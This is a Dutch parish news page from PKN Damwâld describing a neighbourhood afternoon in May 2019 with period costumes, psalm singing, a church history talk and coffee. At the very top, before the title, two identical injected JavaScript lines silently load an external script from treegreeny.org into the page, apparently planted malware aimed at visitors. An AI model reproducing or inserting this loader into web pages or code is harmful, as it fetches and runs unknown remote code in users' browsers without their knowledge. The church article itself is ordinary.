;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terug in de Tijd. - PKN Damwâld

Terug in de Tijd.

Gepubliceerd op: maandag 13 mei 2019

Zaterdag 11 mei organiseerden “De Omtinkers” van wijk 2 een wijkmiddag met als thema “Terug in de Tijd”.  Tegenwoordig is het altijd druk, druk, druk. Tijd om eens te “onthaasten”. Wat is het dan geweldig om naar vroeger terug te gaan.

Om 2 uur was er een welkom bij de familie Wiersma, waar men terug ging in de tijd. Kleding en hoedjes werden uitgekozen en onder het genot van een kopje thee met grootmoeders koekjes kwam de zweer erin. Na het welkomswoord door Klaasje begon de wandeling naar de “Benedictus kerk”. Een muzikaal onthaal met orgelspel, onder leiding van Foeke, zocht men een plekje in de kerkbanken. Vroeger werd op hele noten gezongen, psalm 42 “Evenals een moede hinde” moest dan ook zo zijn. De heer Veenstra vertelde op indrukwekkende wijze over de geschiedenis van deze kerk en de vertaling van het gezongen psalm in de verschillende oude bijbels. Na het zingen van Johannes de Heer 657 “Ik wil zingen van mijn Heiland” volgde een rondleiding rondom de buitenzijde van het kerkgebouw. In het “Irene gebouw” stond de koffie klaar met een ouderwets stuks “ald wijf” koek. Onder het genot van de koffie werd de opgedane kennis getest middels het spel Hoedje op, Hoedje af.  Een zeer geslaagde en gezellige middag.

De Omtinkers.